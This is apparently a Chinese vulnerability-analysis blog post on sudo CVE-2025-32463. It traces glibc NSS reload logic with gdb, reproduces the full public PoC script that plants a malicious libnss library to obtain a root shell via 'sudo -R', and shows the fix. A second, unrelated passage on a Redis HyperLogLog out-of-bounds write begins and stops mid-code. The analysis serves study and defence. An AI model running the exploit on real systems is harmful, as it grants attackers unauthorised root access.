当我看到这个漏洞和代码的时候有一个直觉性的疑问，如果在 chroot 后会进行 /etc/nsswitch.conf 的读取，且读取的是 chroot 里的文件，那么为什么unpivot_root 后代码代码逻辑不会重新读取 /etc/nsswitch.conf 。因此这个漏洞分析以两个疑问展开分析：

pivot_root 和 unpivot_root 之间什么操作导致会重新加载 /etc/nsswitch.conf
为什么 unpivot_root 之后到加载恶意代码之前不会重新读取 /etc/nsswitch.conf

nss_database_check_reload_and_get 分析

对 nss 相关代码的简单追踪，我们定位到 nss_database_check_reload_and_get^[2] 会调用 nss_database_reload 函数进而打开 /etc/nsswitch.conf 配置文件

调用链如下：

1
2
3

static bool nss_database_check_reload_and_get
-> static bool ss_database_reload
-> FILE *fp = fopen (_PATH_NSSWITCH_CONF, "rce");

我们在 pivot_root 之后对 nss_database_check_reload_and_get 下个断点，此时 gdb 的backtrace 如下：

Breakpoint 1, nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7fffffffc510, database_index=nss_database_initgroups)
at ./nss/nss_database.c:396
warning: 396	./nss/nss_database.c: No such file or directory
(gdb) bt
#0  nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7fffffffc510, database_index=nss_database_initgroups) at ./nss/nss_database.c:396
#1  0x00007ffff7d56ddc in internal_getgrouplist (user=user@entry=0x5555555a8d98 "root", group=group@entry=0, size=size@entry=0x7fffffffc568,
groupsp=groupsp@entry=0x7fffffffc570, limit=limit@entry=-1) at ./nss/initgroups.c:75
#2  0x00007ffff7d570dc in getgrouplist (user=user@entry=0x5555555a8d98 "root", group=group@entry=0, groups=groups@entry=0x7ffff7b15010,
ngroups=ngroups@entry=0x7fffffffc5d4) at ./nss/initgroups.c:156
#3  0x00007ffff7fa51a9 in sudo_getgrouplist2_v1 (name=0x5555555a8d98 "root", basegid=0, groupsp=groupsp@entry=0x7fffffffc630,
ngroupsp=ngroupsp@entry=0x7fffffffc63c) at ./getgrouplist.c:105
#4  0x00007ffff7ed987e in sudo_make_gidlist_item (pw=0x5555555a8d68, ngids=<optimized out>, gids=<optimized out>, gidstrs=0x0, type=1) at ./pwutil_impl.c:298
#5  0x00007ffff7ed83d5 in sudo_get_gidlist (pw=0x5555555a8d68, type=type@entry=1) at ./pwutil.c:1033
#6  0x00007ffff7ecfbcb in runas_getgroups (ctx=ctx@entry=0x7ffff7f296a0 <sudoers_ctx>) at ./match.c:146
#7  0x00007ffff7ebbc3c in runas_setgroups (ctx=0x7ffff7f296a0 <sudoers_ctx>) at ./set_perms.c:1634
#8  set_perms (ctx=ctx@entry=0x7ffff7f296a0 <sudoers_ctx>, perm=perm@entry=5) at ./set_perms.c:285
#9  0x00007ffff7edadb8 in resolve_cmnd (ctx=ctx@entry=0x7ffff7f296a0 <sudoers_ctx>, infile=infile@entry=0x7fffffffe594 "woot",
outfile=outfile@entry=0x7fffffffcc40, path=path@entry=0x5555555b0400 "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin")
at ./resolve_cmnd.c:42
#10 0x00007ffff7ebebbc in set_cmnd_path (ctx=ctx@entry=0x7ffff7f296a0 <sudoers_ctx>, runchroot=0x5555555a701c "woot") at ./sudoers.c:1108
#11 0x00007ffff7ebf047 in set_cmnd (ctx=0x7ffff7f296a0 <sudoers_ctx>) at ./sudoers.c:1177
#12 sudoers_check_common (pwflag=pwflag@entry=0, ctx=0x7ffff7f296a0 <sudoers_ctx>) at ./sudoers.c:358
#13 0x00007ffff7ec06c8 in sudoers_check_cmnd (argc=argc@entry=1, argv=argv@entry=0x7fffffffe2d0, env_add=env_add@entry=0x0,
closure=closure@entry=0x7fffffffcdd0) at ./sudoers.c:689
#14 0x00007ffff7eb6673 in sudoers_policy_check (argc=1, argv=0x7fffffffe2d0, env_add=0x0, command_infop=0x7fffffffcea0, argv_out=0x7fffffffcea8,
user_env_out=0x7fffffffceb0, errstr=0x7fffffffcec8) at ./policy.c:1244
#15 0x000055555555cffb in policy_check (run_envp=0x7fffffffceb0, run_argv=0x7fffffffcea8, command_info=0x7fffffffcea0, env_add=0x0, argv=0x7fffffffe2d0,
argc=1) at ./sudo.c:1266
#16 main (

当前 nss_database_check_reload_and_get 的第三个参数 database_index 为 nss_database_initgroups， local 参数结构：

(gdb) p *local
$1 = {data = {nsswitch_conf = {size = 527, ino = 106330, mtime = {tv_sec = 1751446775, tv_nsec = 344332209}, ctime = {tv_sec = 1751446775,
tv_nsec = 345332238}}, services = {0x5555555a1060, 0x5555555a2070, 0x5555555a1200, 0x5555555a20c0, 0x5555555a1200, 0x5555555a2020, 0x0,
0x5555555a20c0, 0x5555555a1060, 0x5555555a1200, 0x5555555a20c0, 0x5555555a2070, 0x5555555a3b20, 0x5555555a2070, 0x5555555a2070, 0x5555555a1200,
0x5555555a20c0}, reload_disabled = 0, initialized = true}, lock = 0, root_ino = 2, root_dev = 64769}

其中 services 对应如下：

DEFINE_DATABASE (aliases)
DEFINE_DATABASE (ethers)
DEFINE_DATABASE (group)
DEFINE_DATABASE (group_compat)
DEFINE_DATABASE (gshadow)
DEFINE_DATABASE (hosts)
DEFINE_DATABASE (initgroups)
DEFINE_DATABASE (netgroup)
DEFINE_DATABASE (networks)
DEFINE_DATABASE (passwd)
DEFINE_DATABASE (passwd_compat)
DEFINE_DATABASE (protocols)
DEFINE_DATABASE (publickey)
DEFINE_DATABASE (rpc)
DEFINE_DATABASE (services)
DEFINE_DATABASE (shadow)
DEFINE_DATABASE (shadow_compat)

在进 nss_database_reload 函数的时候，里面有个逻辑是，如果 staging->services[i] == NULL 就设置为 default 的值，

for (int i = 0; i < NSS_DATABASE_COUNT; ++i)
if (staging->services[i] == NULL)
{
ok = nss_database_select_default (&cache, i,
&staging->services[i]);
if (!ok)
break;
}

由 nss_database_select_default 获取然后设置

static const char per_database_defaults[NSS_DATABASE_COUNT] =
{
[nss_database_group] = nss_database_default_compat,
[nss_database_group_compat] = nss_database_default_nis,
[nss_database_gshadow] = nss_database_default_files,
[nss_database_hosts] = nss_database_default_dns,
[nss_database_initgroups] = nss_database_default_none,
[nss_database_networks] = nss_database_default_dns,
[nss_database_passwd] = nss_database_default_compat,
[nss_database_passwd_compat] = nss_database_default_nis,
[nss_database_publickey] = nss_database_default_nis_nisplus,
[nss_database_shadow] = nss_database_default_compat,
[nss_database_shadow_compat] = nss_database_default_nis,
};


static bool
nss_database_select_default (struct nss_database_default_cache *cache,
enum nss_database db, nss_action_list *result)
{
enum nss_database_default def = per_database_defaults[db];
...
case nss_database_default_none:
/* Very special case: Leave *result as NULL.  */
return true;
...
*result = __nss_action_parse (line);
if (*result == NULL)
{
assert (errno == ENOMEM);
return false;
}
return true;

在 nss_database_initgroups 设置的时候，默认为 None，因此此时 service 为 nss_database_initgroups 是 0x0 (这个很重要)

(gdb) p *local
$1 = {data = {nsswitch_conf = {size = 527, ino = 106330, mtime = {tv_sec = 1751446775, tv_nsec = 344332209}, ctime = {tv_sec = 1751446775,
tv_nsec = 345332238}}, services = {0x5555555a1060, 0x5555555a2070, 0x5555555a1200, 0x5555555a20c0, 0x5555555a1200, 0x5555555a2020, 0x0,
0x5555555a20c0, 0x5555555a1060, 0x5555555a1200, 0x5555555a20c0, 0x5555555a2070, 0x5555555a3b20, 0x5555555a2070, 0x5555555a2070, 0x5555555a1200,
0x5555555a20c0}, reload_disabled = 0, initialized = true}, lock = 0, root_ino = 2, root_dev = 64769}

解释了下，此时((struct nss_database_state *)local)->data.services[nss_database_initgroups]为空的原因，我们接着回到 nss_database_check_reload_and_get的代码里：


static bool
nss_database_check_reload_and_get (struct nss_database_state *local,
nss_action_list *result,
enum nss_database database_index)
{
struct __stat64_t64 str;
/* Acquire MO is needed because the thread that sets reload_disabled
may have loaded the configuration first, so synchronize with the
Release MO store there.  */
if (atomic_load_acquire (&local->data.reload_disabled))
{
*result = local->data.services[database_index];
/* No reload, so there is no error.  */
return true;
}
struct file_change_detection initial;
if (!__file_change_detection_for_path (&initial, _PATH_NSSWITCH_CONF))
return false;
__libc_lock_lock (local->lock);
if (__file_is_unchanged (&initial, &local->data.nsswitch_conf))
{
/* Configuration is up-to-date.  Read it and return it to the
caller.  */
*result = local->data.services[database_index];
__libc_lock_unlock (local->lock);
return true;
}
int stat_rv = __stat64_time64 ("/", &str);
if (local->data.services[database_index] != NULL)
{
/* Before we reload, verify that "/" hasn't changed.  We assume that
errors here are very unlikely, but the chance that we're entering
a container is also very unlikely, so we err on the side of both
very unlikely things not happening at the same time.  */
if (stat_rv != 0
|| (local->root_ino != 0
&& (str.st_ino != local->root_ino
||  str.st_dev != local->root_dev)))
{
/* Change detected; disable reloading and return current state.  */
atomic_store_release (&local->data.reload_disabled, 1);
*result = local->data.services[database_index];
__libc_lock_unlock (local->lock);
return true;
}
}
if (stat_rv == 0)
{
local->root_ino = str.st_ino;
local->root_dev = str.st_dev;
}
__libc_lock_unlock (local->lock);
/* Avoid overwriting the global configuration until we have loaded
everything successfully.  Otherwise, if the file change
information changes back to what is in the global configuration,
the lookups would use the partially-written  configuration.  */
struct nss_database_data staging = { .initialized = true, };
bool ok = nss_database_reload (&staging, &initial);
if (ok)
{
__libc_lock_lock (local->lock);
/* See above for memory order.  */
if (!atomic_load_acquire (&local->data.reload_disabled))
/* This may go back in time if another thread beats this
thread with the update, but in this case, a reload happens
on the next NSS call.  */
local->data = staging;
*result = local->data.services[database_index];
__libc_lock_unlock (local->lock);
}
return ok;
}

在刚进 nss_database_check_reload_and_get 函数的时候，先是判断 local->data.reload_dsiable
是否为 True，如果为True 则直接 return

if (atomic_load_acquire (&local->data.reload_disabled))
{
*result = local->data.services[database_index];
/* No reload, so there is no error.  */
return true;
}

然后是判断/etc/nsswitch.conf文件是否修改:

struct file_change_detection initial;
if (!__file_change_detection_for_path (&initial, _PATH_NSSWITCH_CONF))
return false;
__libc_lock_lock (local->lock);
if (__file_is_unchanged (&initial, &local->data.nsswitch_conf))
{
/* Configuration is up-to-date.  Read it and return it to the
caller.  */
*result = local->data.services[database_index];
__libc_lock_unlock (local->lock);
return true;
}

因为此时是刚 chroot 进来，所以此时的 /etc/nsswitch.conf是一个修改的状态，所以代码会继续往下走。然后是一个重点逻辑, 如果代码判断成功，则设置 local->data.reload_disabled 的值

if (local->data.services[database_index] != NULL)
{
/* Before we reload, verify that "/" hasn't changed.  We assume that
errors here are very unlikely, but the chance that we're entering
a container is also very unlikely, so we err on the side of both
very unlikely things not happening at the same time.  */
if (stat_rv != 0
|| (local->root_ino != 0
&& (str.st_ino != local->root_ino
||  str.st_dev != local->root_dev)))
{
/* Change detected; disable reloading and return current state.  */
atomic_store_release (&local->data.reload_disabled, 1);
*result = local->data.services[database_index];
__libc_lock_unlock (local->lock);
return true;
}
}

因为当前 local->data.services[database_index] 为 NULL （此时((struct nss_database_state *)local)->data.services[nss_database_initgroups]为空）

因此不会去设置 local->data.reload_disabled ，此时 local->data.reload_disabled 仍然为 0

1 2	(gdb) p ((struct nss_database_state *)local)->data.reload_disabled $8 = 0

然后保存当前的 root inode 和 root dev

if (stat_rv == 0)
{
local->root_ino = str.st_ino;
local->root_dev = str.st_dev;
}

最后就走到 bool ok = nss_database_reload (&staging, &initial); 进行 database 的reload。

[!小结]
这里就解答了第一个问题，由于 getgrouplist 的调用因此调用了nss_database_check_reload_and_get 函数。
在nss_database_check_reload_and_get函数里，由于此时 reload_disabled 没有设置且services[nss_database_initgroups] 是空，所以走到了 nss_database_reload 。

reload_disabled

对 nss_database_check_reload_and_get 断点，并在 pivot_root 和unpivot_root 下断点。然后打印出在 nss_database_check_reload_and_get 的第三个参数database_index 。

>end
(gdb) i b
Num     Type           Disp Enb Address            What
3       breakpoint     keep y   <MULTIPLE>
3.1                         y   0x00007ffff7d2b050 in pivot_root at ../sysdeps/unix/syscall-template.S:120
3.2                         y   0x00007ffff7eb59b0 in pivot_root at ./pivot.c:39
4       breakpoint     keep y   0x00007ffff7eb5b00 in unpivot_root at ./pivot.c:64
5       breakpoint     keep y   0x00007ffff7d52300 in nss_database_check_reload_and_get at ./nss/nss_database.c:396
i r rdx
c
(gdb)

我们可以清楚的看到在 pivot_root 和 unpivot_root 前后 nss_database_check_reload_and_get 的参数不同：

Breakpoint 3.2, pivot_root (new_root=0x5555555a701c "woot", state=0x7fffffffcc38) at ./pivot.c:39
39	{
(gdb) c
Continuing.
Download failed: Invalid argument.  Continuing without source file ./nss/./nss/nss_database.c.

Breakpoint 5, nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7fffffffc510, database_index=nss_database_initgroups)
at ./nss/nss_database.c:396
warning: 396	./nss/nss_database.c: No such file or directory
rdx            0x6                 6

Breakpoint 5, nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7fffffffc510, database_index=nss_database_group) at ./nss/nss_database.c:396
396	in ./nss/nss_database.c
rdx            0x2                 2

Breakpoint 4, unpivot_root (state=state@entry=0x7fffffffcc38) at ./pivot.c:64
64	{
(gdb) c
Continuing.
Download failed: Invalid argument.  Continuing without source file ./nss/./nss/nss_database.c.

Breakpoint 5, nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7ffff7e10b68 <__nss_group_database>, database_index=nss_database_group)
at ./nss/nss_database.c:396
warning: 396	./nss/nss_database.c: No such file or directory
rdx            0x2                 2

Breakpoint 5, nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7ffff7e10b68 <__nss_group_database>, database_index=nss_database_group)
at ./nss/nss_database.c:396
396	in ./nss/nss_database.c
rdx            0x2                 2

Breakpoint 5, nss_database_check_reload_and_get (local=0x5555555a1ad0, result=0x7ffff7e10b00 <__nss_shadow_database>, database_index=nss_database_shadow)
at ./nss/nss_database.c:396
396	in ./nss/nss_database.c
rdx            0xf                 15
Downloading separate debug info for libnss_/woot1337.so.2
Download failed: Invalid argument.  Continuing without source file ./nss/./nss/nss_database.c.

整理出来就是：

nss_database_passwd 9
nss_database_passwd 9
nss_database_passwd 9
# pivot_root
nss_database_initgroups 6
nss_database_group 2
# unpivot_root
nss_database_group 2
nss_database_group 2
nss_database_shadow 15 # load lib

在章节 ”nss_database_check_reload_and_get 分析“的时候我们知道 nss_database_initgroups的时候 reload_disabled 不会设置。

当到第一个 nss_database_group 的时候，由于文件没有修改，所以会直接 return。

(gdb) n
418	      *result = local->data.services[database_index];
(gdb) l
413	  __libc_lock_lock (local->lock);
414	  if (__file_is_unchanged (&initial, &local->data.nsswitch_conf))
415	    {
416	      /* Configuration is up-to-date.  Read it and return it to the
417	         caller.  */
418	      *result = local->data.services[database_index];
419	      __libc_lock_unlock (local->lock);
420	      return true;
421	    }
422
(gdb)

不会走后续的逻辑。

当走完 unpivot_root 来到第二个nss_database_group, reload_disabled 没有设置，走到文件修改比较。因为此时已经 unpivot_root, 因此文件是有变化的，程序会继续执行。

当走到 if (local->data.services[database_index] != NULL) 判断的时候

if (local->data.services[database_index] != NULL)
{
/* Before we reload, verify that "/" hasn't changed.  We assume that
errors here are very unlikely, but the chance that we're entering
a container is also very unlikely, so we err on the side of both
very unlikely things not happening at the same time.  */
if (stat_rv != 0
|| (local->root_ino != 0
&& (str.st_ino != local->root_ino
||  str.st_dev != local->root_dev)))
{
/* Change detected; disable reloading and return current state.  */
atomic_store_release (&local->data.reload_disabled, 1);
*result = local->data.services[database_index];
__libc_lock_unlock (local->lock);
return true;
}
}

由于 local->data.services[database_index] 不为空，因此会进入 if 的逻辑。且此时

stat_rv = 0
((struct nss_database_state *)local)->root_ino = 0x560d0
((struct nss_database_state *)0x5555555a1ad0)->root_dev = 0xfd01
str.st_ino != local->root_ino
str.st_dev != local->root_dev

符合这个 if 的判断，会进到 atomic_store_release (&local->data.reload_disabled, 1); , 走完这句代码后 local->data.reload_disabled 就会被设置为 1，然后直接返回。

那么之后剩下的 nss_database_check_reload_and_get 函数调用都会在开头就会返回，不会进到 nss_database_reload 逻辑里

[!小结]
这里就解决了第二个疑问，为什么后续 nss_database_check_reload_and_get 函数调用不会进到 nss_database_reload。因为代码逻辑当 chroot 回到原来的目录的时候，调用第一个 nss_database_check_reload_and_get 会将 reload_disabled 设置成 1 且返回，后续的调用就不会再进 nss_database_reload

load evil library

利用直接参考贴原作者的就行：

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

在不可信任的路径里配置一个 etc/nsswitch.conf, 内容如下：

1 2	bash-5.2$ cat woot/etc/nsswitch.conf passwd: /woot1337

一个有趣的说明，nsswitch.conf中的源的名称也被用作共享对象（库）的路径的一部分。例如，上述LDAP源转化为 libnss_/woot1337.so.2.so。

那么在哪里加载恶意 so 的呢？我们对 dlopen 下一个断点，然后查看一下他的 backtrace。

#0  0x00007ffff7e86191 in woot () from libnss_/woot1337.so.2
#1  0x00007ffff7fca6d5 in call_init (l=0x5555555b5cb0, argc=argc@entry=4, argv=argv@entry=0x7fffffffe2b8, env=env@entry=0x7fffffffe2e0)
at ./elf/dl-init.c:60
#2  0x00007ffff7fca824 in call_init (env=<optimized out>, argv=<optimized out>, argc=<optimized out>, l=<optimized out>) at ./elf/dl-init.c:120
#3  _dl_init (main_map=0x5555555b5cb0, argc=4, argv=0x7fffffffe2b8, env=0x7fffffffe2e0) at ./elf/dl-init.c:121
#4  0x00007ffff7fc65b2 in __GI__dl_catch_exception (exception=exception@entry=0x0, operate=operate@entry=0x7ffff7fd1cc0 <call_dl_init>,
args=args@entry=0x7fffffffc340) at ./elf/dl-catch.c:211
#5  0x00007ffff7fd1d7c in dl_open_worker (a=0x7fffffffc4f0) at ./elf/dl-open.c:829
#6  dl_open_worker (a=a@entry=0x7fffffffc4f0) at ./elf/dl-open.c:792
#7  0x00007ffff7fc651c in __GI__dl_catch_exception (exception=exception@entry=0x7fffffffc4d0, operate=operate@entry=0x7ffff7fd1ce0 <dl_open_worker>,
args=args@entry=0x7fffffffc4f0) at ./elf/dl-catch.c:237
#8  0x00007ffff7fd2164 in _dl_open (file=0x5555555b4d40 "libnss_/woot1337.so.2", mode=<optimized out>, caller_dlopen=0x7ffff7d53a0f <module_load+175>,
nsid=<optimized out>, argc=4, argv=0x7fffffffe2b8, env=0x7fffffffe2e0) at ./elf/dl-open.c:905
#9  0x00007ffff7d840d5 in do_dlopen (ptr=ptr@entry=0x7fffffffc750) at ./elf/dl-libc.c:95
#10 0x00007ffff7fc651c in __GI__dl_catch_exception (exception=exception@entry=0x7fffffffc6e0, operate=0x7ffff7d84090 <do_dlopen>, args=0x7fffffffc750)
at ./elf/dl-catch.c:237
#11 0x00007ffff7fc6669 in _dl_catch_error (objname=0x7fffffffc740, errstring=0x7fffffffc748, mallocedp=0x7fffffffc73f, operate=<optimized out>,
args=<optimized out>) at ./elf/dl-catch.c:256
#12 0x00007ffff7d844ef in dlerror_run (args=0x7fffffffc750, operate=0x7ffff7d84090 <do_dlopen>) at ./elf/dl-libc.c:45
#13 __libc_dlopen_mode (name=<optimized out>, mode=mode@entry=-2147483646) at ./elf/dl-libc.c:162
#14 0x00007ffff7d53a0f in module_load (module=0x5555555af790) at ./nss/nss_module.c:187
#15 0x00007ffff7d53ee5 in __nss_module_load (module=0x5555555af790) at ./nss/nss_module.c:302
#16 __nss_module_get_function (module=0x5555555af790, name=name@entry=0x7ffff7dcf1eb "setspent") at ./nss/nss_module.c:328
#17 0x00007ffff7d5460b in __GI___nss_lookup_function (fct_name=0x7ffff7dcf1eb "setspent", ni=<optimized out>) at ./nss/nsswitch.c:137
#18 __GI___nss_lookup (ni=0x7ffff7e11690 <nip>, fct_name=0x7ffff7dcf1eb "setspent", fct2_name=0x0, fctp=0x7fffffffcac0) at ./nss/nsswitch.c:67
#19 0x00007ffff7d51306 in setup (all=1, startp=0x7ffff7e11680 <startp>, nip=0x7ffff7e11690 <nip>, fctp=0x7fffffffcac0,
lookup_fct=0x7ffff7d50a80 <__GI___nss_shadow_lookup2>, func_name=0x7ffff7dcf1eb "setspent") at ./nss/getnssent_r.c:33
#20 __nss_setent (func_name=func_name@entry=0x7ffff7dcf1eb "setspent", lookup_fct=0x7ffff7d50a80 <__GI___nss_shadow_lookup2>,
nip=nip@entry=0x7ffff7e11690 <nip>, startp=startp@entry=0x7ffff7e11680 <startp>, last_nip=last_nip@entry=0x7ffff7e11688 <last_nip>,
stayopen=stayopen@entry=0, stayopen_tmp=0x0, res=0) at ./nss/getnssent_r.c:76
#21 0x00007ffff7d6490b in setspent () at ../nss/getXXent_r.c:124
#22 0x00007ffff7e98b33 in sudo_setspent () at ./getspwuid.c:122
#23 0x00007ffff7e98c27 in sudo_passwd_init (ctx=<optimized out>, pw=0x5555555a8a78, auth=0x7ffff7f29020 <auth_switch>) at ./auth/passwd.c:57
#24 0x00007ffff7e97a84 in sudo_auth_init (ctx=ctx@entry=0x7ffff7f296a0 <sudoers_ctx>, pw=0x5555555a8a78, mode=mode@entry=33554433)
at ./auth/sudo_auth.c:117
#25 0x00007ffff7e9a9a3 in check_user (ctx=ctx@entry=0x7ffff7f296a0 <sudoers_ctx>, validated=validated@entry=96, mode=33554433) at ./check.c:136
#26 0x00007ffff7ebf201 in sudoers_check_common (pwflag=pwflag@entry=0, ctx=0x7ffff7f296a0 <sudoers_ctx>) at ./sudoers.c:468
#27 0x00007ffff7ec06c8 in sudoers_check_cmnd (argc=argc@entry=1, argv=argv@entry=0x7fffffffe2d0, env_add=env_add@entry=0x0,
closure=closure@entry=0x7fffffffcdd0) at ./sudoers.c:689
#28 0x00007ffff7eb6673 in sudoers_policy_check (argc=1, argv=0x7fffffffe2d0, env_add=0x0, command_infop=0x7fffffffcea0, argv_out=0x7fffffffcea8,
user_env_out=0x7fffffffceb0, errstr=0x7fffffffcec8) at ./policy.c:1244
#29 0x000055555555cffb in policy_check (run_envp=0x7fffffffceb0, run_argv=0x7fffffffcea8, command_info=0x7fffffffcea0, env_add=0x0, argv=0x7fffffffe2d0,
argc=1) at ./sudo.c:1266
#30 main (argc=<optimized out>, argv=<optimized out>, envp=0x7fffffffe2e0) at ./sudo.c:261
(gdb)

从这个调用链，我们就很清楚的知道了是在 setspent 之后进行的 dlopen 加载恶意的 so

policy_check -> sudoers_policy_check -> sudoers_check_cmnd
-> sudoers_check_common
-> set_cmnd_path
-> check_user -> sudo_auth_init -> sudo_passwd_init -> sudo_setspent -> setspent
-> setup -> module_load

那么 setspent 做了什么呢？ setspent 函数会用来打开 shadows 文件的方法一个使用的例子


setpwent();
while(gets(buf) != NULL)
{
if((sp = getspnam(buf)) != (struct spwd *) 0 )
{
printf("Vaild login name is:%s\n",sp->sp_namp);
}
else
{
setspent();
while((sp = getspent()) != (struct spwd *)0)
{
printf("%s\n", sp->sp_namp);
}
}

setspent 实现代码^[3]

void
SETFUNC_NAME (STAYOPEN)
{
int save;
__libc_lock_lock (lock);
__nss_setent (SETFUNC_NAME_STRING, DB_LOOKUP_FCT, &nip, &startp,
&last_nip, STAYOPEN_VAR, STAYOPEN_TMPVAR, NEED__RES);
save = errno;
__libc_lock_unlock (lock);
__set_errno (save);
}

当调用到module_load的时候就会加载 so

/* Internal implementation of __nss_module_load.  */
static bool
module_load (struct nss_module *module)
{
if (strcmp (module->name, "files") == 0)
return module_load_nss_files (module);
if (strcmp (module->name, "dns") == 0)
return module_load_nss_dns (module);
void *handle;
{
char *shlib_name;
if (__asprintf (&shlib_name, "libnss_%s.so%s",
module->name, __nss_shlib_revision) < 0)
/* This is definitely a temporary failure.  Do not update
module->state.  This will trigger another attempt at the next
call.  */
return false;
handle = __libc_dlopen (shlib_name);
free (shlib_name);
}
/* Failing to load the module can be caused by several different
scenarios.  One such scenario is that the module has been removed
from the disk.  In which case the in-memory version is all that
we have, and if the module->state indidates it is loaded then we
can use it.  */
if (handle == NULL)
{
/* dlopen failure.  We do not know if this a temporary or
permanent error.  See bug 22041.  Update the state using the
double-checked locking idiom.  */
__libc_lock_lock (nss_module_list_lock);
bool result = result;
switch ((enum nss_module_state) atomic_load_acquire (&module->state))
{
case nss_module_uninitialized:
atomic_store_release (&module->state, nss_module_failed);
result = false;
break;
case nss_module_loaded:
result = true;
break;
case nss_module_failed:
result = false;
break;
}
__libc_lock_unlock (nss_module_list_lock);
return result;
}
nss_module_functions_untyped pointers;
/* Look up and store locally all the function pointers we may need
later.  Doing this now means the data will not change in the
future.  */
for (size_t idx = 0; idx < array_length (nss_function_name_array); ++idx)
{
char *function_name;
if (__asprintf (&function_name, "_nss_%s_%s",
module->name, nss_function_name_array[idx]) < 0)
{
/* Definitely a temporary error.  */
__libc_dlclose (handle);
return false;
}
pointers[idx] = __libc_dlsym (handle, function_name);
free (function_name);
PTR_MANGLE (pointers[idx]);
}

复现

Patched

修复 commit ^[5]：

--- sudo-1.9.17/plugins/sudoers/sudoers.c       2025-06-12 12:12:38.000000000 -0500
+++ sudo/plugins/sudoers/sudoers.c      2025-06-10 11:27:57.493871502 -0500
@@ -1080,7 +1080,6 @@
int
set_cmnd_path(struct sudoers_context *ctx, const char *runchroot)
{
-    struct sudoers_pivot pivot_state = SUDOERS_PIVOT_INITIALIZER;
const char *cmnd_in;
char *cmnd_out = NULL;
char *path = ctx->user.path;
@@ -1099,13 +1098,7 @@
if (def_secure_path && !user_is_exempt(ctx))
path = def_secure_path;

-    /* Pivot root. */
-    if (runchroot != NULL) {
-       if (!pivot_root(runchroot, &pivot_state))
-           goto error;
-    }
-
-    ret = resolve_cmnd(ctx, cmnd_in, &cmnd_out, path);
+    ret = resolve_cmnd(ctx, cmnd_in, &cmnd_out, path, runchroot);
if (ret == FOUND) {
char *slash = strrchr(cmnd_out, '/');
if (slash != NULL) {
@@ -1122,14 +1115,8 @@
else
ctx->user.cmnd = cmnd_out;

-    /* Restore root. */
-    if (runchroot != NULL)
-       (void)unpivot_root(&pivot_state);
-
debug_return_int(ret);
error:
-    if (runchroot != NULL)
-       (void)unpivot_root(&pivot_state);
free(cmnd_out);
debug_return_int(NOT_FOUND_ERROR);
}

删除了 pivot_root ，以及看后续似乎要 deprecated chroot ^[6] ：

思考

这个漏洞有一个很巧合的地方，如果当pivot_root之后，调用到的第一个nss_database_check_reload_and_get 的第三个参数 database_index 不是 nss_database_initgroups , 且默认 nss_database_initgroups 初始化就是空，那么就会走到 reload_disabled 的地方并且返回，那么之后就根本不会再读取 nsswich.conf。

我们去跟了下 libc 对 nss_database 初始化的变更 ^[4], 上一次的更改在五年前，但是这个漏洞是在 23 年引入的。目前看起来没什么特别的大关联，应该就是特别特别的巧合。。。

Reference link

1.https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot↩
2.https://codebrowser.dev/glibc/glibc/nss/nss_database.c.html#nss_database_check_reload_and_get↩
3.https://codebrowser.dev/glibc/glibc/nss/getXXent_r.c.html#122↩
4.https://github.com/bminor/glibc/commit/fa78feca47fdc226b46e7f6fea4c08c10fccd182↩
5.https://github.com/sudo-project/sudo/commit/fdafc2ceb36382b07e604c0f39903d56bef54016#diff-6a3fc5e12751032d02db8970967b688eab54525c326699010870b3ffca2b6541↩
6.https://github.com/sudo-project/sudo/commit/bc88e5cbd3b41196cac727855e2446a02dfba51e↩

CVE-2025-32023 Redis 漏洞分析

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

CVE-2025-32023 Redis 漏洞分析

Swing

2025-07-08

漏洞分析

redis

TL; DR

漏洞分析版本： commit a0a6f23d997b024689ba157916837f493a593a34 (HEAD, tag: 7.4.2)

该漏洞是 PlaidCTF 2025 “Zerodeo” 题目。

CVE-2025-32023

Redis 在调用 pfmerge 命令的时候会调用 hyperloglog.c 里的 void pfmergeCommand(client *c) 函数

pfmerge ^[1] 的作用是将多个 HLL 的数据合并到一个目标 key 中，是用来合并多个 HypeLogLog （HLL）数据。对格式错误的 HLL 进行操作时，可能会使 int i 中计数的总长度溢出为负值。这允许攻击者覆盖 HLL 结构上的负偏移量，从而导致栈/堆上的越界写。 (eg: hllMerge() 函数中会发生栈越界， hllSparseToDense() 发生堆越界写）

漏洞原理

/* PFMERGE dest src1 src2 src3 ... srcN => OK */
void pfmergeCommand(client *c){
uint8_t max[HLL_REGISTERS];
struct hllhdr *hdr;
int j;
int use_dense = 0; /* Use dense representation as target? */

/* Compute an HLL with M[i] = MAX(M[i]_j).
* We store the maximum into the max array of registers. We'll write
* it to the target variable later. */
memset(max,0,sizeof(max));
for (j = 1; j < c->argc; j++) {
...
/* Merge with this HLL with our 'max' HLL by setting max[i]
* to MAX(max[i],hll[i]). */
if (hllMerge(max,o) == C_ERR) { // hllMerge [1] stack oob write
...
}
}


/* Convert the destination object to dense representation if at least
* one of the inputs was dense. */
if (use_dense && hllSparseToDense(o) == C_ERR) { // hllSparseToDense [2] heap oob write
...
}

...
}

在 hllSparseToDense 函数中会造成堆相关的越界写，作者的漏洞利用也是用的这个漏洞原语。

int hllSparseToDense(robj *o){
sds sparse = o->ptr, dense;
struct hllhdr *hdr, *oldhdr = (struct hllhdr*)sparse;
int idx = 0, runlen, regval;
uint8_t *p = (uint8_t*)sparse, *end = p+sdslen(sparse);

/* If the representation is already the right one return ASAP. */
hdr = (struct hllhdr*) sparse;
